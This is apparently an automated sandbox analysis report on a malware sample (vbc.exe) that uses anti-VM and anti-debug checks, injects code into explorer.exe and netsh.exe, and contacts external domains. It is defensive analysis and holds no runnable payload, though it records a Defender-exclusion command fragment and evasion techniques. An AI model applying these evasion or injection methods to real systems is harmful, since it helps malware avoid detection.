Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2628	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2364	Thread sleep time: -104467s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2928	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 1664	Thread sleep time: -50000s >= -30000s	Jump to behavior

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 104467			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000006.00000000.2191793558.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2178483576.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.2178522395.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.2178483576.0000000004234000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000006.00000000.2191836237.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 5_2_009026F8 mov eax, dword ptr fs:[00000030h]		5_2_009026F8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D226F8 mov eax, dword ptr fs:[00000030h]		7_2_00D226F8

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\explorer.exe	Domain query: www.glendalesocialmediaagency.com
Source: C:\Windows\explorer.exe	Domain query: www.switchfinder.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Thread register set: target process: 1388			Jump to behavior